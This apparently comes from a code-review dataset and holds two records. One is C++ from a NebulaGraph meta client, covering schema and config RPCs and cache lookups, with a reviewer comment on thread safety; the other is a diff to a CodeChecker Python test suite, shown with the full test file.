folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceEdgeIndexByType_.find(std::make_pair(space, edgeType));
if (it == spaceEdgeIndexByType_.end()) {
return Status::Error("Edge is no exist!");
}
return it->second;
}
StatusOr<std::vector<std::string>> MetaClient::getAllEdgeFromCache(const GraphSpaceID& space) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceAllEdgeMap_.find(space);
if (it == spaceAllEdgeMap_.end()) {
return Status::Error("Edge is no exist!");
}
return it->second;
}
folly::Future<StatusOr<bool>>
MetaClient::multiPut(std::string segment,
std::vector<std::pair<std::string, std::string>> pairs) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| pairs.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::MultiPutReq req;
std::vector<cpp2::Pair> data;
for (auto& element : pairs) {
data.emplace_back(apache::thrift::FragileConstructor::FRAGILE,
std::move(element.first), std::move(element.second));
}
req.set_segment(std::move(segment));
req.set_pairs(std::move(data));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_multiPut(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::string>>
MetaClient::get(std::string segment, std::string key) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| key.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::GetReq req;
req.set_segment(std::move(segment));
req.set_key(std::move(key));
folly::Promise<StatusOr<std::string>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_get(request);
}, [] (cpp2::GetResp&& resp) -> std::string {
return resp.get_value();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<std::vector<std::string>>>
MetaClient::multiGet(std::string segment, std::vector<std::string> keys) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| keys.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::MultiGetReq req;
req.set_segment(std::move(segment));
req.set_keys(std::move(keys));
folly::Promise<StatusOr<std::vector<std::string>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_multiGet(request);
}, [] (cpp2::MultiGetResp&& resp) -> std::vector<std::string> {
return resp.get_values();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<std::vector<std::string>>>
MetaClient::scan(std::string segment, std::string start, std::string end) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| start.empty() || end.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::ScanReq req;
req.set_segment(std::move(segment));
req.set_start(std::move(start));
req.set_end(std::move(end));
folly::Promise<StatusOr<std::vector<std::string>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_scan(request);
}, [] (cpp2::ScanResp&& resp) -> std::vector<std::string> {
return resp.get_values();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::remove(std::string segment, std::string key) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| key.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::RemoveReq req;
req.set_segment(std::move(segment));
req.set_key(std::move(key));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_remove(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::removeRange(std::string segment, std::string start, std::string end) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| start.empty() || end.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::RemoveRangeReq req;
req.set_segment(std::move(segment));
req.set_start(std::move(start));
req.set_end(std::move(end));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_removeRange(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
PartsMap MetaClient::getPartsMapFromCache(const HostAddr& host) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
return doGetPartsMap(host, localCache_);
}
PartMeta MetaClient::getPartMetaFromCache(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = localCache_.find(spaceId);
CHECK(it != localCache_.end());
auto& cache = it->second;
auto partAllocIter = cache->partsAlloc_.find(partId);
CHECK(partAllocIter != cache->partsAlloc_.end());
PartMeta pm;
pm.spaceId_ = spaceId;
pm.partId_ = partId;
pm.peers_ = partAllocIter->second;
return pm;
}
bool MetaClient::checkPartExistInCache(const HostAddr& host,
GraphSpaceID spaceId,
PartitionID partId) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = localCache_.find(spaceId);
if (it != localCache_.end()) {
auto partsIt = it->second->partsOnHost_.find(host);
if (partsIt != it->second->partsOnHost_.end()) {
for (auto& pId : partsIt->second) {
if (pId == partId) {
return true;
}
}
}
}
return false;
}
bool MetaClient::checkSpaceExistInCache(const HostAddr& host,
GraphSpaceID spaceId) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = localCache_.find(spaceId);
if (it != localCache_.end()) {
auto partsIt = it->second->partsOnHost_.find(host);
if (partsIt != it->second->partsOnHost_.end() && !partsIt->second.empty()) {
return true;
}
}
return false;
}
int32_t MetaClient::partsNum(GraphSpaceID spaceId) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = localCache_.find(spaceId);
CHECK(it != localCache_.end());
return it->second->partsAlloc_.size();
}
folly::Future<StatusOr<TagID>>
MetaClient::createTagSchema(GraphSpaceID spaceId, std::string name, nebula::cpp2::Schema schema) {
cpp2::CreateTagReq req;
req.set_space_id(std::move(spaceId));
req.set_tag_name(std::move(name));
req.set_schema(std::move(schema));
folly::Promise<StatusOr<TagID>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_createTag(request);
}, [] (cpp2::ExecResp&& resp) -> TagID {
return resp.get_id().get_tag_id();
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<TagID>>
MetaClient::alterTagSchema(GraphSpaceID spaceId,
std::string name,
std::vector<cpp2::AlterSchemaItem> items,
nebula::cpp2::SchemaProp schemaProp) {
cpp2::AlterTagReq req;
req.set_space_id(std::move(spaceId));
req.set_tag_name(std::move(name));
req.set_tag_items(std::move(items));
req.set_schema_prop(std::move(schemaProp));
folly::Promise<StatusOr<TagID>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_alterTag(request);
}, [] (cpp2::ExecResp&& resp) -> TagID {
return resp.get_id().get_tag_id();
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::TagItem>>>
MetaClient::listTagSchemas(GraphSpaceID spaceId) {
cpp2::ListTagsReq req;
req.set_space_id(std::move(spaceId));
folly::Promise<StatusOr<std::vector<cpp2::TagItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listTags(request);
}, [] (cpp2::ListTagsResp&& resp) -> decltype(auto){
return std::move(resp).get_tags();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::dropTagSchema(int32_t spaceId, std::string tagName) {
cpp2::DropTagReq req;
req.set_space_id(spaceId);
req.set_tag_name(std::move(tagName));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_dropTag(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<nebula::cpp2::Schema>>
MetaClient::getTagSchema(int32_t spaceId, std::string name, int64_t version) {
cpp2::GetTagReq req;
req.set_space_id(spaceId);
req.set_tag_name(std::move(name));
req.set_version(version);
folly::Promise<StatusOr<nebula::cpp2::Schema>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getTag(request);
}, [] (cpp2::GetTagResp&& resp) -> nebula::cpp2::Schema {
return std::move(resp).get_schema();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<EdgeType>>
MetaClient::createEdgeSchema(GraphSpaceID spaceId, std::string name, nebula::cpp2::Schema schema) {
cpp2::CreateEdgeReq req;
req.set_space_id(std::move(spaceId));
req.set_edge_name(std::move(name));
req.set_schema(schema);
folly::Promise<StatusOr<EdgeType>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_createEdge(request);
}, [] (cpp2::ExecResp&& resp) -> EdgeType {
return resp.get_id().get_edge_type();
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::alterEdgeSchema(GraphSpaceID spaceId,
std::string name,
std::vector<cpp2::AlterSchemaItem> items,
nebula::cpp2::SchemaProp schemaProp) {
cpp2::AlterEdgeReq req;
req.set_space_id(std::move(spaceId));
req.set_edge_name(std::move(name));
req.set_edge_items(std::move(items));
req.set_schema_prop(std::move(schemaProp));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_alterEdge(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::EdgeItem>>>
MetaClient::listEdgeSchemas(GraphSpaceID spaceId) {
cpp2::ListEdgesReq req;
req.set_space_id(std::move(spaceId));
folly::Promise<StatusOr<std::vector<cpp2::EdgeItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listEdges(request);
}, [] (cpp2::ListEdgesResp&& resp) -> decltype(auto) {
return std::move(resp).get_edges();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<nebula::cpp2::Schema>>
MetaClient::getEdgeSchema(GraphSpaceID spaceId, std::string name, SchemaVer version) {
cpp2::GetEdgeReq req;
req.set_space_id(std::move(spaceId));
req.set_edge_name(std::move(name));
req.set_version(version);
folly::Promise<StatusOr<nebula::cpp2::Schema>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getEdge(request);
}, [] (cpp2::GetEdgeResp&& resp) -> nebula::cpp2::Schema {
return std::move(resp).get_schema();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::dropEdgeSchema(GraphSpaceID spaceId, std::string name) {
cpp2::DropEdgeReq req;
req.set_space_id(std::move(spaceId));
req.set_edge_name(std::move(name));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_dropEdge(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
StatusOr<std::shared_ptr<const SchemaProviderIf>>
MetaClient::getTagSchemaFromCache(GraphSpaceID spaceId, TagID tagID, SchemaVer ver) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto spaceIt = localCache_.find(spaceId);
if (spaceIt == localCache_.end()) {
// Not found
return std::shared_ptr<const SchemaProviderIf>();
} else {
auto tagIt = spaceIt->second->tagSchemas_.find(std::make_pair(tagID, ver));
if (tagIt == spaceIt->second->tagSchemas_.end()) {
return std::shared_ptr<const SchemaProviderIf>();
} else {
return tagIt->second;
}
}
}
StatusOr<std::shared_ptr<const SchemaProviderIf>> MetaClient::getEdgeSchemaFromCache(
GraphSpaceID spaceId, EdgeType edgeType, SchemaVer ver) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto spaceIt = localCache_.find(spaceId);
if (spaceIt == localCache_.end()) {
// Not found
VLOG(3) << "Space " << spaceId << " not found!";
return std::shared_ptr<const SchemaProviderIf>();
} else {
auto edgeIt = spaceIt->second->edgeSchemas_.find(std::make_pair(edgeType, ver));
if (edgeIt == spaceIt->second->edgeSchemas_.end()) {
VLOG(3) << "Space " << spaceId << ", EdgeType " << edgeType << ", version "
<< ver << " not found!";
return std::shared_ptr<const SchemaProviderIf>();
} else {
return edgeIt->second;
}
}
}
const std::vector<HostAddr>& MetaClient::getAddresses() {
return addrs_;
}
StatusOr<SchemaVer> MetaClient::getNewestTagVerFromCache(const GraphSpaceID& space,
const TagID& tagId) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceNewestTagVerMap_.find(std::make_pair(space, tagId));
if (it == spaceNewestTagVerMap_.end()) {
return -1;
}
return it->second;
}
StatusOr<SchemaVer> MetaClient::getNewestEdgeVerFromCache(const GraphSpaceID& space,
const EdgeType& edgeType) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceNewestEdgeVerMap_.find(std::make_pair(space, edgeType));
if (it == spaceNewestEdgeVerMap_.end()) {
return -1;
}
return it->second;
}
folly::Future<StatusOr<bool>> MetaClient::heartbeat() {
if (clusterId_.load() == 0) {
clusterId_ = ClusterIdMan::getClusterIdFromFile(FLAGS_cluster_id_path);
}
cpp2::HBReq req;
nebula::cpp2::HostAddr thriftHost;
thriftHost.set_ip(localHost_.first);
thriftHost.set_port(localHost_.second);
req.set_host(std::move(thriftHost));
req.set_cluster_id(clusterId_.load());
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
LOG(INFO) << "Send heartbeat to " << leader_ << ", clusterId " << req.get_cluster_id();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_heartBeat(request);
}, [this] (cpp2::HBResp&& resp) -> bool {
if (clusterId_.load() == 0) {
LOG(INFO) << "Persisit the cluster Id from metad " << resp.get_cluster_id();
if (ClusterIdMan::persistInFile(resp.get_cluster_id(),
FLAGS_cluster_id_path)) {
clusterId_.store(resp.get_cluster_id());
} else {
LOG(FATAL) << "Can't persist the clusterId in file "
<< FLAGS_cluster_id_path;
}
}
return true;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<int64_t>> MetaClient::balance() {
cpp2::BalanceReq req;
folly::Promise<StatusOr<int64_t>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_balance(request);
}, [] (cpp2::BalanceResp&& resp) -> int64_t {
return resp.id;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>> MetaClient::balanceLeader() {
cpp2::LeaderBalanceReq req;
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_leaderBalance(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::regConfig(const std::vector<cpp2::ConfigItem>& items) {
cpp2::RegConfigReq req;
req.set_items(items);
folly::Promise<StatusOr<int64_t>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_regConfig(request);
}, [] (cpp2::ExecResp&& resp) -> decltype(auto) {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::ConfigItem>>>
MetaClient::getConfig(const cpp2::ConfigModule& module, const std::string& name) {
if (!configReady_) {
return Status::Error("Not ready!");
}
cpp2::ConfigItem item;
item.set_module(module);
item.set_name(name);
cpp2::GetConfigReq req;
req.set_item(item);
folly::Promise<StatusOr<std::vector<cpp2::ConfigItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getConfig(request);
}, [] (cpp2::GetConfigResp&& resp) -> decltype(auto) {
return std::move(resp).get_items();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::setConfig(const cpp2::ConfigModule& module, const std::string& name,
const cpp2::ConfigType& type, const std::string& value) {
if (!configReady_) {
return Status::Error("Not ready!");
}
cpp2::ConfigItem item;
item.set_module(module);
item.set_name(name);
item.set_type(type);
item.set_mode(cpp2::ConfigMode::MUTABLE);
item.set_value(value);
cpp2::SetConfigReq req;
req.set_item(item);
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_setConfig(request);
}, [] (cpp2::ExecResp&& resp) -> decltype(auto) {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::ConfigItem>>>
MetaClient::listConfigs(const cpp2::ConfigModule& module) {
if (!configReady_) {
return Status::Error("Not ready!");
}
cpp2::ListConfigsReq req;
req.set_module(module);
folly::Promise<StatusOr<std::vector<cpp2::ConfigItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listConfigs(request);
}, [] (cpp2::ListConfigsResp&& resp) -> decltype(auto) {
return std::move(resp).get_items();
}, std::move(promise));
return future;
}
void MetaClient::loadCfgThreadFunc() {
loadCfg();
addLoadCfgTask();
}
bool MetaClient::registerCfg() {
auto ret = regConfig(gflagsDeclared_).get();
if (ret.ok()) {
LOG(INFO) << "Register gflags ok " << gflagsDeclared_.size();
configReady_ = true;
}
return configReady_;
}
void MetaClient::loadCfg() {
if (!configReady_ && !registerCfg()) {
return;
}
// only load current module's config is enough
auto ret = listConfigs(gflagsModule_).get();
if (ret.ok()) {
// if we load config from meta server successfully, update gflags and set configReady_
auto tItems = ret.value();
std::vector<ConfigItem> items;
for (const auto& tItem : tItems) {
items.emplace_back(toConfigItem(tItem));
}
MetaConfigMap metaConfigMap;
for (auto& item : items) {
std::pair<cpp2::ConfigModule, std::string> key = {item.module_, item.name_};
metaConfigMap.emplace(std::move(key), std::move(item));
}
{
// For any configurations that is in meta, update in cache to replace previous value
folly::RWSpinLock::WriteHolder holder(configCacheLock_);
for (const auto& entry : metaConfigMap) {
auto& key = entry.first;
auto it = metaConfigMap_.find(key);
if (it == metaConfigMap_.end() || metaConfigMap[key].value_ != it->second.value_) {
updateGflagsValue(entry.second);
LOG(INFO) << "update config in cache " << key.second
<< " to " << metaConfigMap[key].value_;
metaConfigMap_[key] = entry.second;
}
}
}
} else {
LOG(INFO) << "Load configs failed: " << ret.status();
return;
}
}
void MetaClient::addLoadCfgTask() {
size_t delayMS = FLAGS_load_data_interval_secs * 1000 + folly::Random::rand32(900);
bgThread_->addDelayTask(delayMS, &MetaClient::loadCfgThreadFunc, this);
LOG(INFO) << "Load configs completed, call after " << delayMS << " ms";
}
void MetaClient::updateGflagsValue(const ConfigItem& item) {
if (item.mode_ != cpp2::ConfigMode::MUTABLE) {
return;
}
std::string metaValue;
switch (item.type_) {
case cpp2::ConfigType::INT64:
metaValue = folly::to<std::string>(boost::get<int64_t>(item.value_));
break;
case cpp2::ConfigType::DOUBLE:
metaValue = folly::to<std::string>(boost::get<double>(item.value_));
break;
case cpp2::ConfigType::BOOL:
metaValue = boost::get<bool>(item.value_) ? "true" : "false";
break;
case cpp2::ConfigType::STRING:
metaValue = boost::get<std::string>(item.value_);
break;
}
std::string curValue;
if (!gflags::GetCommandLineOption(item.name_.c_str(), &curValue)) {
return;
} else if (curValue != metaValue) {
LOG(INFO) << "update " << item.name_ << " from " << curValue << " to " << metaValue;
gflags::SetCommandLineOption(item.name_.c_str(), metaValue.c_str());
}
}
ConfigItem MetaClient::toConfigItem(const cpp2::ConfigItem& item) {
VariantType value;
switch (item.get_type()) {
case cpp2::ConfigType::INT64:
value = *reinterpret_cast<const int64_t*>(item.get_value().data());
break;
case cpp2::ConfigType::BOOL:
value = *reinterpret_cast<const bool*>(item.get_value().data());
break;
case cpp2::ConfigType::DOUBLE:
value = *reinterpret_cast<const double*>(item.get_value().data());
break;
case cpp2::ConfigType::STRING:
value = item.get_value();
break;
}
return ConfigItem(item.get_module(), item.get_name(), item.get_type(), item.get_mode(), value);
}
} // namespace meta
} // namespace nebula
| 1 | 21,871 | maybe can not return a map directly, it will be modified by inner thread. | vesoft-inc-nebula | cpp |
@@ -299,7 +299,7 @@ class Diff(unittest.TestCase):
cmp_data)
# Unesolved core checkers.
test_res = {'core.NullDereference': 4, 'core.DivideZero': 3}
- self.assertDictEqual(diff_res, test_res)
+ self.assertDictContainsSubset(test_res, diff_res)
def test_get_diff_checker_counts_all_unresolved(self):
""" | 1 | #
# -----------------------------------------------------------------------------
# The CodeChecker Infrastructure
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
# -----------------------------------------------------------------------------
"""
Diff feature tests. Comparing results from two runs.
"""
import os
import unittest
import logging
import re
import shared
import subprocess
from codeCheckerDBAccess.ttypes import DiffType
from codeCheckerDBAccess.ttypes import CompareData
from codeCheckerDBAccess.ttypes import ReportFilter_v2
from libtest.thrift_client_to_db import get_all_run_results_v2
from libtest.debug_printer import print_run_results
from libtest import env
def get_severity_level(name):
"""
Convert severity level from the name to value.
"""
return shared.ttypes.Severity._NAMES_TO_VALUES[name]
class Diff(unittest.TestCase):
_ccClient = None
def setUp(self):
test_workspace = os.environ['TEST_WORKSPACE']
test_class = self.__class__.__name__
print('Running ' + test_class + ' tests in ' + test_workspace)
# Get the clang version which is tested.
self._clang_to_test = env.clang_to_test()
self._testproject_data = env.setup_test_proj_cfg(test_workspace)
self.assertIsNotNone(self._testproject_data)
self._cc_client = env.setup_viewer_client(test_workspace)
self.assertIsNotNone(self._cc_client)
# Get the run names which belong to this test.
run_names = env.get_run_names(test_workspace)
runs = self._cc_client.getRunData(None)
test_runs = [run for run in runs if run.name in run_names]
for r in test_runs:
print(r)
# There should be at least two runs for this test.
self.assertIsNotNone(runs)
self.assertNotEqual(len(runs), 0)
self.assertGreaterEqual(len(runs), 2)
# Name order matters from __init__ !
self._base_runid = test_runs[0].runId # base
self._new_runid = test_runs[1].runId # new
self._codechecker_cmd = env.codechecker_cmd()
self._report_dir = os.path.join(test_workspace, "reports")
self._test_config = env.import_test_cfg(test_workspace)
self._run_names = env.get_run_names(test_workspace)
def test_get_diff_res_count_new(self):
"""
Count the new results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
diff_res = self._cc_client.getRunResultCount_v2([base_run_id],
None,
cmp_data)
# 5 new core.CallAndMessage issues.
self.assertEqual(diff_res, 5)
def test_get_diff_res_count_new_no_base(self):
"""
Count the new results with no filter and no baseline
run ids.
"""
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
diff_res = self._cc_client.getRunResultCount_v2([],
None,
cmp_data)
# 5 new core.CallAndMessage issues.
self.assertEqual(diff_res, 5)
def test_get_diff_results_new(self):
"""
Get the new results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
diff_res = self._cc_client.getRunResults_v2([base_run_id],
500,
0,
[],
None,
cmp_data)
# 5 new core.CallAndMessage issues.
self.assertEqual(len(diff_res), 5)
def test_get_diff_results_resolved(self):
"""
Get the resolved results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
diff_res = self._cc_client.getRunResults_v2([base_run_id],
500,
0,
[],
None,
cmp_data)
self.assertEqual(len(diff_res), 3)
def test_get_diff_results_unresolved(self):
"""
Get the unresolved results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = self._cc_client.getRunResults_v2([base_run_id],
500,
0,
[],
None,
cmp_data)
self.assertEqual(len(diff_res), 18)
def test_get_diff_res_count_resolved(self):
"""
Count the resolved results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
diff_res = self._cc_client.getRunResultCount_v2([base_run_id],
None,
cmp_data)
# 3 disappeared core.StackAddressEscape issues.
self.assertEqual(diff_res, 3)
def test_get_diff_res_count_unresolved(self):
"""
Count the unresolved results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
base_count = self._cc_client.getRunResultCount_v2([base_run_id],
None,
None)
logging.debug("Base run id: %d", base_run_id)
logging.debug("Base count: %d", base_count)
base_run_res = get_all_run_results_v2(self._cc_client, base_run_id)
print_run_results(base_run_res)
new_count = self._cc_client.getRunResultCount_v2([new_run_id],
None,
None)
logging.debug("New run id: %d", new_run_id)
logging.debug("New count: %d", new_count)
new_run_res = get_all_run_results_v2(self._cc_client, new_run_id)
print_run_results(new_run_res)
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = self._cc_client.getRunResultCount_v2([base_run_id],
None,
cmp_data)
self.assertEqual(diff_res, 18)
def test_get_diff_res_count_unresolved_filter(self):
base_run_id = self._base_runid
new_run_id = self._new_runid
filter_severity_levels = [{"MEDIUM": 1}, {"LOW": 5},
{"HIGH": 12}, {"STYLE": 0},
{"UNSPECIFIED": 0}, {"CRITICAL": 0}]
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
for level in filter_severity_levels:
for severity_level, test_result_count in level.items():
sev = get_severity_level(severity_level)
sev_filter = ReportFilter_v2(severity=[sev])
diff_result_count = self._cc_client.getRunResultCount_v2(
[base_run_id], sev_filter, cmp_data)
self.assertEqual(test_result_count, diff_result_count)
def test_get_diff_checker_counts(self):
"""
Test diff result types for new results.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
None,
cmp_data)
# core.CallAndMessage is the new checker.
test_res = {"core.CallAndMessage": 5}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_checker_counts_core_new(self):
"""
Test diff result types for new core checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
report_filter = ReportFilter_v2(checkerName=["*core*"])
diff_res = self._cc_client.getCheckerCounts([base_run_id],
report_filter,
cmp_data)
# core.CallAndMessage is the new checker.
test_res = {"core.CallAndMessage": 5}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_checker_counts_unix_resolved(self):
"""
Test diff result types for resolved unix checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
report_filter = ReportFilter_v2(checkerName=["*core*"])
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
report_filter,
cmp_data)
# Resolved core checkers.
test_res = {'core.StackAddressEscape': 3}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_checker_counts_core_unresolved(self):
"""
Test diff result types for resolved unix checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
report_filter = ReportFilter_v2(checkerName=["*core*"])
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
report_filter,
cmp_data)
# Unesolved core checkers.
test_res = {'core.NullDereference': 4, 'core.DivideZero': 3}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_checker_counts_all_unresolved(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
None,
cmp_data)
# All unresolved checkers.
test_res = {'core.DivideZero': 3,
'core.NullDereference': 4,
'cplusplus.NewDelete': 5,
'deadcode.DeadStores': 5,
'unix.Malloc': 1}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_severity_counts_all_unresolved(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
sev_res = self._cc_client.getSeverityCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.Severity.HIGH: 12,
shared.ttypes.Severity.LOW: 5,
shared.ttypes.Severity.MEDIUM: 1}
self.assertDictEqual(sev_res, test_res)
def test_get_diff_severity_counts_all_new(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
sev_res = self._cc_client.getSeverityCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.Severity.HIGH: 5}
self.assertDictEqual(sev_res, test_res)
def test_get_diff_new_review_status_counts(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
res = self._cc_client.getReviewStatusCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.ReviewStatus.UNREVIEWED: 5}
self.assertDictEqual(res, test_res)
def test_get_diff_unres_review_status_counts(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
